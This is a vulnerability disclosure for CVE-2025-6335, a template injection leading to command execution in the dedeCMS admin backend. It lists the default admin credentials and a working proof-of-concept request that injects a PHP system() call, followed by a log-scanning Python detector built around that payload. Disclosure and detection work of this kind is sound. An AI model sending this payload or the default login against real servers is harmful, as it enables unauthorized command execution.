jujubooom/CVE-2025-6335

Title: Template injection command execution vulnerability in dedeCMS 5.7 sp2

BUG_Author: Ewoji

Affected Version: dedeCMS < 5.7.2

Vendor: Shanghai Zhuozhuo Network Technology Co., LTD

Software: dedeCMS

Vulnerability Files:

  • /include/dedetag.class.php

Description:

  1. After installation, log in to the admin backend

    • Use the default account and password admin/admin
  2. Exploiting the Template

    • Access the dede/co_get_corule.php interface
    • Pass in the parameter /dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1. Sending this request twice executes the command
  3. Verifying the Exploit:

    • If the injection is successful, the attacker can execute arbitrary commands

Proof of Concept:

/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Sending this request twice executes the command.

Detail: CVE-2025-6335 - dedeCMS backend template injection RCE
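A defender-side check for the request described above, as an added example that is not part of the original repository: it scans web access logs for calls to co_get_corule.php whose decoded notes parameter opens a {dede: tag with punctuation instead of a tag name, and lists clients that sent it at least twice. The log format, the sample lines and the "tag name starts with a letter" rule are assumptions made for this example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (documentation IPs, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jul/2025:10:00:01 +0000] "GET /dede/co_get_corule.php?notes=%7Bdede%3A%22%29%3Bsystem%28%27calc%27%29%3B%2F%2F%2F%7D&job=1 HTTP/1.1" 200 512
203.0.113.7 - - [01/Jul/2025:10:00:03 +0000] "GET /dede/co_get_corule.php?notes=%7Bdede%3A%22%29%3Bsystem%28%27calc%27%29%3B%2F%2F%2F%7D&job=1 HTTP/1.1" 200 512
198.51.100.20 - - [01/Jul/2025:10:05:00 +0000] "GET /dede/co_get_corule.php?notes=%7Bdede%3Asample%7D&job=1 HTTP/1.1" 200 733
192.0.2.9 - - [01/Jul/2025:10:09:00 +0000] "GET /dede/co_get_corule.php?notes=%7bdede%3a%22%29%3bsystem%28%27calc%27%29%3b%2f%2f%2f%7d&job=1 HTTP/1.1" 200 512
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')
# Assumption: a legitimate tag name starts with a letter, so "{dede:" followed by
# a quote, bracket or other punctuation matches the shape of the payload on this page.
BROKEN_TAG_RE = re.compile(r'\{dede:\s*[^A-Za-z\s]', re.IGNORECASE)

def suspicious_requests(log_text):
    """Return (client, decoded notes value) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        # Assumption: match on the file name in case the admin directory was renamed.
        if not url.path.endswith("/co_get_corule.php"):
            continue
        # parse_qs percent-decodes the value, so encoded payloads are compared decoded.
        for notes in parse_qs(url.query).get("notes", []):
            if BROKEN_TAG_RE.search(notes):
                hits.append((client, notes))
    return hits

def repeat_clients(hits, threshold=2):
    """Clients that sent the flagged request at least `threshold` times."""
    counts = Counter(client for client, _ in hits)
    return sorted(c for c, n in counts.items() if n >= threshold)

if __name__ == "__main__":
    hits = suspicious_requests(SAMPLE_LOG)
    for client, notes in hits:
        print(client, notes)
    print("repeated:", repeat_clients(hits))
```

The repeat count reflects the write-up's statement that the request has to be sent twice; a single flagged hit is still worth reviewing.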
